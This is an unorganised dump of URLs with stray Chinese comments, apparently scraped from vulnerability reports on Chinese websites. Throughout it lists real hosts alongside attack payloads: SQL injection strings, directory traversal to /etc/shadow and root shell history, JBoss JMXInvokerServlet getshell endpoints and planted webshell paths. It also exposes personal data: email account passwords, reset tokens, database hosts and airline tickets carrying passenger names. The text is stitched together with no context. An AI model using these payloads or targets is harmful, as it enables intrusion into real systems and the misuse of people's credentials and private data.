http://www.physics.fudan.edu.cn/ www.fdsm.fudan.edu.cn/ www.xwxy.fudan.edu.cn/ www.gsao.fudan.edu.cn https://mail.fudan.edu.cn/ www.econ.fudan.edu.cn www.urp.fudan.edu.cn www.fso.fudan.edu.cn/ www.cs.fudan.edu.cn iso.fudan.edu.cn/xuewei.htm www.law.fudan.edu.cn yjsxk.fudan.edu.cn/wsxk/ www.gs.fudan.edu.cn/ www.freshman.fudan.edu.cn www.fao.fudan.edu.cn/ www.fudan-forward.com www.fudan.org.cn/ www.fudan.hk http://it.fudan.edu.cn/ http://xk.fudan.edu.cn/xk/ www.fudan-wuxi.net/ www.fudan-edu.com www.fudan-alumni.org www.fudan-printer.com uricompare.com/www/ www.fudan-edu.com.cn http://bbs.jlc001.com/ http://bbs.jinlianchu.com/ https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://1.85.4.132:8000/ http://xiezi.foundertype.com/ http://xiezi.foundertype.com/MrWrite2SIM/xml/20150420192358.asp http://1.51.203.1:8000/show_sb.php?yid=407 http://180.153.28.120:8017/Default.aspx http://180.153.28.120:8017/List.aspx?TitleID=13 http://222.204.3.84/login.action http://222.204.3.65/ http://www.ilas.com.cn/ http://ilas.lib.hustwb.edu.cn:8088/BookRetrInfo.aspx?nRecno=125644&nType=1&strISBN=7-80164-778-5 http://sj.whsw.cn/BookRetrInfo.aspx?nRecno=26520&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-303-15324-4 http://219.140.64.135:8088/BookRetrInfo.aspx?nRecno=158547&nType=1&strISBN=7-5053-9731-1 http://210.34.212.78/phone/BookRetrInfo.aspx?nRecno=68077&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-5617-6071-0&nType=242 http://27.24.159.150:8088/BookRetrInfo.aspx?nRecno=5174&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-5671-0379-5&nType=242 inurl:http://www.ceair.com/server/ticket.html?tktNo= http://www.ceair.com/server/ticket.html?tktNo=7812182280777&paxName=%E5%85%B3%E5%88%A9%E8%90%8D&certify=p46a http://www.ceair.com/server/ticket.html?tktNo=781-2496119556&paxName=%E9%BB%84%E7%8E%BA&certify=7p347 http://www.ceair.com/server/ticket.html?tktNo=7812494402973&paxName=%E9%B2%81%E7%9D%BF&certify=ngpn www.ycbus.com/login.html http://sns.wasu.cn//zfq/zfqindex.aspx?id=1&rid=0.8573297215625644&type=getdetail http://wooyun.org/bugs/wooyun-2010-086216。这篇帖子,正巧也在审计KPPW,也就去看了用一下最新版对于爆出问题的修补方式。最新版为了防止该漏洞,添加了一个验证。 http://pmdx.crbcint.com:8088/portal/admin/login.action https://8.9fbank.com/bbs/ https://mail.shenma-inc.com/ http://wooyun.org/bugs/wooyun-2015-0100773于是抱着尝试的态度登陆成功了, http://kdd.xidian.edu.cn/ http://kdd.xidian.edu.cn:8082/ http://kdd.xidian.edu.cn:8082/computer/%28master%29/script http://www.up-real.com/Eabout.asp?id=2的: http://www.maplevisa.com/Eabout.asp?id=2的: http://www.elsonicsolar.com/eabout.asp?id=2的: http://www.up-real.com/Ebusiness.asp?id=10的 http://www.up-real.com/EDownload.asp?id=12的: http://www.caizhimofang.com/answer/answer?id=11 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://zone.wooyun.org/content/16772 http://www.alijijinhui.org/index.php?id=08Eunion http://www.alijijinhui.org/index.php?id=08Eunion http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select http://www.alijijinhui.org/index.php?id=1 http://www.cae.com.cn/ http://www.now.cn/email/ demo:http://mail.now.cn/ http://mail.now.cn http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/manage/admin.php?C=member&M=login https://mail.173.com/ http://l0086ivs.cn/wapx.asp http://l0086ivs.cn/admin http://mail.meizu.com/ http://wooyun.org/bugs/wooyun-2010-074841 http://210.76.70.246/login/ http://bbs.z.admin5.com/home.php?mod=space&uid=189619 http://shenbao.py-axa.com/retrade/ http://118329329.cn/admin.action wap.beargoo.com.cn/detail.php?menid=1626&smallid=774 http://sqlmap.org http://hr.edu.xxt.cn/download/downloadExcel.jsp?excelName=.%2Fdownload%2FdownloadExcel.jsp&downloadId=1677 http://**.**.**/roomAction/getListForWebsite.action http://u.ctrip.com/union/LoginShow.aspx?backUrl=http%3A//u.ctrip.com/union/MyInfo/OrderOnRequest.aspx%3Ftype%3DFlight https://vpn.citic.com/ http://1.63.18.108:8015/index/main!queryById.action http://www.teacher.com.cn/,点击里面“教师社区”,跳到网址:http://c.teacher.com.cn/,进行登陆。 inurl:supplierManage/edit.do?supplierid= http://jc.cscec.com/gjc/buyer/supplier/supplierManage/edit.do?supplierid=29707ed65a6e444ca2fcd212246f3310&pagestate=queryAuditPage.do&tabid=baseinfo http://jc.cscec.com/gjc/buyer/supplier/supplierManage/edit.do?supplierid=7e2c972430bf4dcfa4455d30d2e84642&pagestate=queryAuditPage.do&tabid=baseinfo&objttype=1&suppemployeeid=null http://open.ctrip.com/login.aspx?ReturnUrl=%2FVacations%2FTicketSenicSpotSearch%2Ftabid%2F196%2Fctl%2FEdit%2Fmid%2F773%2FDefault.aspx%3FpopUp%3Dtrue http://ilife.homelink.com.cn/aigou/admin.php http://ilife.homelink.com.cn/aigou/admin.php http://www.yanxiu.com/login.html http://fms.camera360.com:8880/ http://fms.camera360.com:8880/phpmyadmin/index.php http://221.8.57.110/i-card/loginToJumpAction.action http://221.8.57.110/i-card/loginToJumpAction.action http://pay.game.renren.com/login?url=http%3A%2F%2Fpay.game.renren.com%2Fpay%3Fg%3Dms http://218.28.13.244:800/zyedu/login.action http://123.125.97.177:80/webportal/loginSp/userLogin.action http://help.10010.com/web/admin/system_manage.jsp http://hi.163.com/qn/?username=skur1314@163.com&password=skur520.&captcha=9xcbk&autologin=on&loginbtn=%B5%C7%C2%BC%D6%D0%A1%AD&lgwin=true http://hi.163.com/qn?username=fuyue19910924@163.com&password=fuyue37027&captcha=kaxee&loginbtn=%B5%C7%C2%BC%D6%D0%A1%AD http://1.202.249.237:8080/ http://1.202.249.237/WebOS/Login.aspx http://blog.english.ctrip.com/ http://blog.english.ctrip.com/wp-login.php http://zhongyi.ifeng.com/login.html member.feiniu.com/my_returns/chooseReturn_cancel/201504CO25012161 member.feiniu.com/my_returns/chooseReturn_cancel/201504CO25****** http://124.165.216.39:8080/proposal/loginindex.action?user.s=1 http://www.sdwstj.org/webPage/i/oem/wsb/处存在弱口令 username:123 password:123456 http://capi.dianyadian.com/User/GetCustomerLoginSMS http://capi.dianyadian.com/OAuth/tokenNewVersion http://capi.dianyadian.com/Common/FGetUserAmountInfo http://capi.dianyadian.com/Order/FSubmitOrderDetails coding:utf8 http://zzawb.gov.cn/web.rar http://zzawb.gov.cn/admin2012 http://webtrade.ebscn.com/invoker/JMXInvokerServlet http://118.123.170.74:8082/login!pwd.action http://c41_wangpan.houdunphp.com/houduan/filemanager/index.php http://www.envsc.cn///admin/js/adminlogin.js泄露登录密码 http://cg.chaoxing.com https://m.wukonglicai.com http://person.shgjj.com/shgjjwxzjcx/wxzjcx/login.action www.mdsxy.com/product_show.asp?action=common&ID=385 http://222.186.19.195:2007/web/login.html http://**.**.**/web/jsp/index.action_ http://www.xplus.com/ http://e.myrb.net/www/index.php?mod=admin&con=user&act=view&username=1 http://news.xd56b.com/www/index.php?mod=admin&con=user&act=view&username=1 http://qk.zgsyb.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://szrb.sz-news.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://epaper.dongmanbao.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://**.**.**/xiaofang/xiaofang/Consultation_list.do_ http://**.**.**/xiaofang/xiaofang/Consultation_goReply.do_ http://**.**.**/AskList.aspxkey=-1 http://202.98.155.106/DZJJNWZHZZ/getDetailedContent.action?contId=6081 http://**.**.**/portal/companArticle.doid=1185_ http://**.**.**/qsksyy/ywblcx.do处_ http://www.czgj.cn/ http://www.czgj.cn/data/mysql/数据库账号密码,这是最重要的,果不其然顺利下载 http://www.czgj.cn/data/mysql_error_trace.php爆路径 http://www.stockstar.com就是这个主站的接口,可以看到是没有做任何登陆防护机制的 http://www.samsoncn.com/ http://210.41.176.25/manage/updateTable.aspx http://www.xsdxbzk.com/manage/updateTable.aspx http://myxk.hznu.edu.cn/manage/updateTable.aspx http://www.ahstuxb.com//manage/updateTable.aspx http://jhau.paperopen.com/manage/updateTable.aspx http://www.nnrc.com.cn/resume/resume-show.php?id=60178 http://test.xdoa.cn:82/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://test.xdoa.cn/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://221.208.251.28/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://219.146.182.244:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://218.106.144.212:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://211.137.17.222/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://124.130.146.94:8080/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://122.156.212.26:81/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://61.189.154.189/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://60.22.137.82/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.247.127.126/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.222.9.3:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.222.9.3:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.18.167.227/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://27.154.63.250:81/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://www.viewgood.cn http://zhibo.jsedu.sh.cn/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://116.236.137.30//viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://xtxx.am.jsedu.sh.cn/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://61.155.83.162:88/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://61.132.41.91/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://www.imooc.com/user/resetpasspage?active=ODMxNjY4N0BxcS5jb20sMTQzMDAyNDA0OAuuid=MTkwMTExMg==&linkid=NDI4MjQw http://www.imooc.com/user/resetpasspage?active=邮箱,1430024048&uuid=1901112&linkid=428240 http://www.imooc.com/user/resetpasspage?active=MTA3NjkwODQ3N0BxcS5jb20sMTQzMDAyOTA1MA%3D%3D&uuid=MTkwMjMzMQ==&linkid=NDI4NDAy www.guerrillamail.com注册2个账户 ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell http://www.ouc-edu.com/zxdt2.asp?id=170 http://www.xiaoyuer.com/ http://www.hnkj.com.cn/ http://ahxcly.gov.cn/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.ajaz.cn/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.ahodc.com/main/model/childcatalog/liuyanban.jsp?page=2&sql_where= http://www.ahluqiao.com/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.acegdc.com/main/model/childcatalog/liuyanban.jsp?page=1&sql_where= http://www.piaoyou.org/ http://demo.piaoyou.org/ http://www.yeehang.cc/ http://zw.jiritong.com/ http://sl.4000211929.com/ http://sdn.4000211929.com/ http://oa.wuzhouair.com/ http://oa.yccas.com/ http://oa.starstrip.net/ http://oa.ryxtrip.com/ http://oa.wuzhouair.com/PiaoYou_root.aspx http://demo.piaoyou.org/PiaoYou_root.aspx http://www.yeehang.cc//PiaoYou_root.aspx http://zw.jiritong.com/PiaoYou_root.aspx http://oa.ryxtrip.com/PiaoYou_root.aspx http://bu.foundertech.com/founderit/CN/ProductDetail.aspx?Type=IT&ID=104 http://tech.weibo.com/wp-admin/plugins.php http://www.gzredcross.org.cn/redbbs/admindefault.asp https://github.com/companyService/crawler_code/blob/70a9663c70d091814d675a388c4585acdeac40cd/company_service/settings.py https://101.69.217.162 http://es-hz.tcl.com存在一个sql注入漏洞。该网站的数据是access的,注入是属于布尔型盲注,可被脱裤。 http://www.caizhimofang.com/Home/Index/findpwdPhone www.guerrillamail.com注册2个账户 http://www.bcrj.com.cn/ http://202.196.33.227:8080/opac_two/serials/s_right.jsp?class_no=O http://219.144.130.220:38080/opac_two/serials/s_right.jsp?class_no=A http://202.200.87.32:1080/opac_two/serials/s_right.jsp?class_no=A http://218.107.191.111:9080/opac_two/serials/s_right.jsp?class_no=P http://opac.zzti.edu.cn:8080/opac_two/serials/s_right.jsp?class_no=A http://baozoumanhua.com/login http://www.liepin.com/user/lpt/ http://video2.duxiu.com//userinfo.asp?u=longzi http://video2.duxiu.com//userinfo.asp?u=renyiyonghu http://183.203.9.12:8080/XinoAMTY/index.jsp http://183.203.9.12:8080/XinoAMTY/login_user.action http://183.203.9.12:8080/XinoAMTY/login_user.action jboss-4.2.1.GA/server/default/./deploy/XinoAMTY.war jboss-4.2.1.GA/bin http://183.203.9.12:8080/XinoAMTY/login_user.action jboss-4.2.1.GA/server/default/./deploy/XinoAMTY.war/ http://tiwen.gdhsfz.xuexi365.com/paper2fav/morePaperL http://sqlmap.org http://www.zlinfo.com.cn/login.action http://218.6.249.93:83/tdjsb/html/2014-12/27/node_1.htm http://subscribe.chinadaily.com.cn/subReceiptQuery/select.action http://www.banyou.com http://www.banyou.com/user/alipayvip.asp http://www.zjs.com.cn/IntegalAdmin/UserManage.aspx http://www.zjs.com.cn/WS_Business/reg.aspx?Id=5 http://www.zjs.com.cn/WS_Business/WS_CustomLogin.aspx http://www.zjs.com.cn/IntegalAdmin/Default.aspx http://udc.weibo.com/wp-admin/ http://sbooking.ctrip.com/ http://apps.wandoujia.com/apps/com.ctrip.selectmerchants?pos=w/tag/%E9%85%92%E5%BA%97 http://travel.chinadaily.com.cn/events/events-list?m=2016-03 http://travel.chinadaily.com.cn/index/info/iid/* http://admin.colorful.cn/Common/ShowImages.ashx http://sqlmap.org http://www.js808.cn/newSite/Other/verifypwd.aspx?ucode=test&uemail=test@126.com http://118.122.80.201:8088/ http://cop.chanjet.com http://61.139.105.105:8008/IMRoleServlet?pt=del&rolecode=1 http://124.128.96.98:8001/IMUnitServlet?pt=add&org_code=1 http://www.mafengwo.cn/u/90104036.html http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/c3tidms/dms/login.action http://admin.houtai.xunzai.com/login.php http://gl.law.ruc.edu.cn/www.zip http://42.62.14.38:9200/_status http://42.62.14.38:9200/_cluster/health http://42.62.14.38:9200/_nodes http://42.62.14.38:9200/_search?pretty http://42.62.14.38:9200/wooyun/test/1 http://42.62.14.38:9200/wooyun-test curlhttp://42.62.14.38:9200/wooyun/test/_search?pretty http://42.62.14.38:9200/wooyun http://union.lashou.com http://www.byxwlzx.com/ http://jjjc.sqxz.gov.cn/ jjjc.sqxz.gov.cn/manager.do http://jjjc.sqxz.gov.cn/showUGB.do http://www.tlsp.net/showUGB.do http://www.yjxzfw.com.cn/showUGB.do http://218.201.232.67:8080/showUGB.do http://www.sinanxzfw.gov.cn/showUGB.do http://112.124.0.240:8000/ http://open.21ic.com//.svn/entries http://rszp.cqu.edu.cn/zpsys/index.jsp http://rczp.zafu.edu.cn/zpsys/index.jsp http://rszp.gdufs.edu.cn/zpsys/index.jsp http://rszp.scuec.edu.cn/zpsys/index.jsp http://rczp.zafu.edu.cn/zpsys/index.jsp http://rszp.gdufs.edu.cn/zpsys/index.jsp http://rszp.njupt.edu.cn/zpsys/index.jsp http://rszp.wfu.edu.cn/zpsys/index.jsp http://zp.xjau.edu.cn/zpsys/index.jsp http://hr.aufe.edu.cn/zpsys/index.jsp http://www.hnzzjob.com/Jobs.aspx?zwid=000000007137 http://jianzhan.hnzzjob.com/ http://co-diovan.medlive.cn/?c=index&city=1&m=academic http://co-diovan.medlive.cn/?m=academic&c=video&id=30 http://co-diovan.medlive.cn/?c=video&id=11&m=academic inurl:ecdomain http://www.lntour.gov.cn/ http://www.dggjj.cn/ http://jdzd.daqing.gov.cn/ http://gaj.daqing.gov.cn/ http://www.gdcourts.gov.cn/ http://www.jsnt.lss.gov.cn/ http://www.handanshebao.com.cn/ http://www.jhwsj.gov.cn/ http://www.asjy.gov.cn/ http://www.lnpj.hrss.gov.cn/ http://www.jlsgjj.cn/ http://www.ccfdw.gov.cn/ http://www.gslz.lss.gov.cn/ http://cygjj.gov.cn/ http://www.jlyb.lss.gov.cn/ http://www.lulong.gov.cn/ http://www.tqyb.cc/ http://www.lnbxhrss.gov.cn/ http://www.tj.lss.gov.cn/ http://www.jsnt.lss.gov.cn/ http://jlyb.lss.gov.cn/ http://www.cygjj.gov.cn/ http://**.**.**/nxwzga.rar_ http://t.cn/**** http://**.**.**/lygaj.rar http://dic.medlive.cn/common/ajax.inc.php http://cesu.shangdu.com/这个平台存在svn源代码泄露,可遍历浏览整个网站的源代码。 http://www.nccz.gov.cn https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.tmfdc.gov.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.xgfdc.com.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.gyfcj.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.hxfdc.gov.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.sxczxzjj.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.jlxfdc.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.yxfgs.net/Web_Site/Search.aspx?type=0&keyword= http://www.xtsfdc.com/Web_Site/Search.aspx?type=0&keyword= http://www.zsxfdc.com/Web_Site/Search.aspx?type=0&keyword= http://sxqyxzjj.com/Web_Site/Search.aspx?type=0&keyword= http://www.yczfj.com/Web_Site/Search.aspx?type=0&keyword= http://ypfdc.cn/Web_Site/Search.aspx?type=0&keyword= http://www.fxfcj.com/Web_Site/Search.aspx?type=0&keyword= http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/hosts http://42.62.25.196/../../../../../../../../../../../../../../../../../etc/hosts http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/shadow http://42.62.25.196/../../../../../../../../../../../../../../../../../root/.bash_history rtmp://pull.showself.com/ rtmp://pull.showself.com/ about:blank http://**.**.** http://**.**.**/invoker/JMXInvokerServlet_ http://**.**.**/sws/index.sws http://zkbm.gyzkzx.com/CodeMang/CountyCodeTab_Add.php http://110.80.10.170:8081/jmx-console/ http://110.80.10.170:8081/oa/notneedlogin/checkusercodelevel.jsp?userid=admin http://110.80.10.170:8081/zmeu/cs.jsp http://110.80.10.170:8081/zecmd/zecmd.jsp http://www.swupl.edu.cn/guanli http://www.swupl.edu.cn/guanli/cpseditor/editor/filemanage/download.asp?filename=./../../guanli/cpseditor/editor/filemanage/download.asp http://cms.kisdee.com/yp/product.php?prowhere=1 http://temp.auto.163.com:8087/ http://i.medlive.cn http://chana-mazda.dma.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150309&end_time=20150409&page_size=6&graph_type=histogram&1428532005517 http://www.cits.cn/marketing/APP/2wm/index.html http://wooyun.org/bugs/wooyun-2010-0107690 http://wutongyu.info/iliebao.htm http://182.18.5.16:8080/people/cap/cap-login.htm http://171.8.76.134:8080/admin-console http://121.41.87.36:8080/ jdbc:mysql://123.103.61.153:3306 jdbc:mysql://123.103.21.189:3306 jdbc:mysql://wstvwzsj.mysql.rds.aliyuncs.com:3306 jdbc:mysql://hlwltrds.mysql.rds.aliyuncs.com:3306 www.dycredit.gov.cn http://113.57.156.14:91/pm/sys/Login_dologin.action http://www.taoke.com/ucenter.php?item=index&action=message&utype=all&job=viewsub&subid=236221 URL:support1.lenovo.com.cn http://support1.lenovo.com.cn:80/lenovo/wsi/index.html http://202.104.120.130/ http://202.104.120.130:85/ http://central.dlhis.com/index.php?r=Hawt/default/main>_id=1 http://central.dlhis.com/index.php?r=Hawt/default/main>_id=1 http://central.dlhis.com/inde.php http://www.dlhis.com/news_show.asp?news_id=23 http://workorder.fabao.cn:925/secure/Signup!default.jspa http://training.sobey.com/ http://training.sobey.com/phpMyAdmin http://blz.medlive.cn http://hotel.cits.cn/hotel/detail/35.html?city_id= http://www.sees.ynu.edu.cn/manage/Login.aspx http://wooyun.org/bugs/wooyun-2015-0105516。其中有一个分站地址是http://tj.fruitday.com/。感觉很简陋的样子,登陆的时候万能密码绕过。 http://www.chinasofti.com/ http://www.jxfx.agri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.bjfs.agri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://fxagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.zfagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.sczgagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://school.yinliancn.com http://school.yinliancn.com http://mail.51greenorange.com/ http://210.22.154.138:8003/ http://210.22.154.138:8003/dede http://oa.cnhxcc.com.cn/zhhxpm/sys/Login_dologin.action http://ticket.cits.cn/dest/cpw-tBJA.html http://ticket.cits.cn/dest/cpw-tBJA-p1.html http://ticket.cits.cn/dest/cpw-tBJA-pa1-p1.html http://ticket.cits.cn/dest/cpw-tBJA-pa1-pt0008.html http://ticket.cits.cn/dest/cpw-tBJA-pa1-pt0019.html http://ticket.cits.cn/dest/cpw-tBJA-pa1.html http://ticket.cits.cn/dest/cpw-tBJA-pa2-pt0008.html http://mintrust.minmetals.com.cn/wkxtweb/product/netWorthShow?product.id=11F7AF8D260D44C5B7D08EA9D2ED59BF9988 http://124.42.59.103:8080/presale/logon.do http://124.42.59.103:8080/invoker/JMXInvokerServlet,getshell http://w.189.cn/ http://m.sobeycloud.com/APIServiceReceiver?siteId=37&method=getAdvertisement&type=banner clsid:23A860E9-0C41-4E01-9206-D3FC0E413645 http://www.gotohuawei.com/admin/Runtime/Logs/ RunTime:0.000803s http://61.146.213.192/gdczsam/index.jsp http://210.76.65.208:7001/gdczsam/index.jsp http://61.145.75.123:8000/gdczsam/index.jsp http://218.16.249.227:7001/gdczsam/index.jsp http://218.16.249.227:7001/gdczsam/index.jsp http://121.11.76.118:9090/gdczsam/index.jsp http://www.aizhenghun.com/ http://202.84.17.254/upload/uploadPlace.do?method=getDepartment&fatherId=gnfs http://hr.chinatelecom-ec.com.cn http://hr.chinatelecom-ec.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://hr.chinatelecom-ec.com.cn/UserFiles/File/ctsi.jsp http://www.mao10.com http://www.mao10.com/post-group-single-id-283.html http://xxs.la/r3TBKf http://jobs.ch.com http://60.172.2.211:8081/ http://www.fyzcgl.com/ http://218.22.115.165:8011/ http://www.fyyqqgz.com/ http://zcgl.yscz.gov.cn:8001/default.aspx http://220.180.150.228/ http://www.lqzcgl.com/ http://218.22.114.166:8011/default.aspx http://www.fyzcgl.com/fygx/ http://zc100.com/ http://www.fnzcgl.com/ http://zc.mas.gov.cn:8080/ http://zc.yyxcz.gov.cn:81/ http://www.wooyun.org/bugs/wooyun-2015-0110745/ https://219.134.131.240/report/Action/delAllChoice.php?delID=1*|a&type=accessUpperSet https://125.93.31.253/ucenter/main/zkxy.php?CommonFlag=S&gModuleId=sjjk&gProgramId=1cmsgmanage&gUpd=R&id=1 https://125.93.31.253/ucenter/ https://60.223.226.154/ucenter/ https://110.65.138.9/ucenter/ https://218.108.62.254/ucenter/ https://220.165.220.62/ucenter/ http://ses.gdqts.gov.cn:8091/gdtsout/jsp/dealLogin.jsp?j_username= http://114.112.93.215:50070/ http://auto.qq.com/a/20131230/013010.htm https://github.com/tecshuttle/car/blob/40247b966a8b47692343be4a6d04030bc2ccb207/application/config/production/database.php http://leshi.wy-fund.com:80/ http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080102 http://homelinktc.sinaapp.com/ http://homelinktc.sinaapp.com:80/s.php http://homelinktc.sinaapp.com:80/s1.php http://homelinktc.sinaapp.com:80/s2.php http://homelinktc.sinaapp.com:80/s3.php http://homelinktc.sinaapp.com:80/s4.php http://homelinktc.sinaapp.com/admin.php http://rep.fttcc.com/ http://myadm.fttcc.com/ http://www.gxpiao.com/Movie_page1.aspx?dyyid=1 http://www.gxpiao.com/Movie_page2.aspx?dybm=1 http://hotel.cits.cn/hotel/detail/1410.html?&city_id=70082 http://travel.chinadaily.com.cn/trip/city/id/20/cate/* https://github.com/z306223558/TedoInformantion/blob/29c8f15e67970aa798086639a34d6e239f32916f/Api/TestUser/Conf/config.php https://zabbix.hichao.com/zabbix/ http://sl.zhuna.cn/order/cancel_order/?orderid=150615820 http://leshi.wy-fund.com/api.php?fundId=000008&date1=20150401&date2=20150401&amount=100000 http://langdu.jlu.edu.cn/poetry/playAction.action http://you.ctrip.com/ajaxnew/GetUserCate.ashx?callback=a&_=1430122802406 http://partner.zhongkuai.com/ http://e.lvmama.com http://ebooking.lvmama.com/vst_ebooking/adminlogin.do http://17500.cn:80/p3/p3allresult.php http://17500.cn/3d/3Dallresult.php http://17500.cn/3d/info4488.php http://17500.cn/p3/info4488.php http://sms.chengduair.cc/.svn/entries http://wooyun.org/bugs/wooyun-2015-0110567 http://www.js808.cn/ www.js808.cn http://**.**.**/statisticsweb/userLogin.action http://wsyj.zjwst.gov.cn/XT_Login/ http://122.112.16.208:8080/back/main.jsp http://sope.ruc.edu.cn/www.rar http://123.138.17.36:8080/slsdjt/login.jsp http://123.138.17.36:8080/invoker/JMXInvokerServlet http://123.138.17.36:8080/jmxconsole/, http://115.182.70.243/api_list/ http://115.182.70.243/item/get_detail/?id=7090415575480086581 http://**.**.**/video/ http://www.dianyisheji.com/ http://www.gxcjcy.com/dianyi/index.php?action=login http://gxdawang.com/dianyi/index.php?action=login http://www.fpg1919.com/dianyi/index.php?action=login http://gxpcjz.com/dianyi/index.php?action=login http://gxmingjia.com/dianyi/index.php?action=admin&op=login http://ss-hearing.com/dianyi/index.php?action=admin&op=login http://www.gxruiyi.com/dianyi/index.php?action=admin&op=login http://gxymzs.com/dianyi/index.php?action=admin&op=login http://www.17500.cn/tools/qushiajax.php http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://cda.data.chinacache.com/phpinfo.php http://220.181.65.245:88/data/cache2/svn/public/cda/ca/script http://192.168.1.1/xdslcfg.html http://192.168.1.1/ctwancfg.html http://192.168.1.1/ctdhcp.html http://192.168.1.1/cttr69cfg.html http://LNRMS.chinaunicom.com:9090/RMS-server/RMS http://192.168.1.1/ctadminpswd.html http://192.168.1.1/resetrouter.html http://192.168.1.1/defaultsettings.html http://192.168.1.1/backupsettings.conf http://95c.com.cn/ http://cj.haut.edu.cn/zyjs/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1 http://www.bgits.com.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1 http://www.zdiad.com.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.cranewhcz.com/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.bjdfsd.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.langyuhb.com/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=4 http://www.95590.cn/ebiz/view/renewal/vehicleRenewalInsuranceCalculateSkin.jsp?chanceId=13533143 http://www.rqbao.com:80/member/setNewPassword?email=MTUxNDQxMzkyOEBxcS5jb20= http://www.rqbao.com:80/member/setNewPassword?email=MTUxNDQxMzkyOEBxcS5jb20= http://www.duba.com/zt/questionnaire/index.php?c=index&a=index http://www.duba.com/nav.php?c=pic&a=download&file=Li4vaW5kZXgucGhw http://www.duba.com/nav.php?c=pic&a=download&file= http://ffp.xiamenair.com/web.zip http://wooyun.org/bugs/wooyun-2014-072384 http://down.chinaz.com/soft/33301.htm inurl:class_detail.asp?id= http://www.gcdbyey.cn/class_detail.asp?id=164 http://www.pd-goodbaby.com/class_detail.asp?id=124 http://www.fzejx.com/class_detail.asp?id=153 http://myszfy.scsyyey.net/class_detail.asp?id=127 http://www.lrbly.com/class_detail.asp?id=121 http://logs.zhuna.cn/ts.php http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://finder.unking.cn/BackupSmsSucc http://finder.unking.cn/GetRestoreUrl 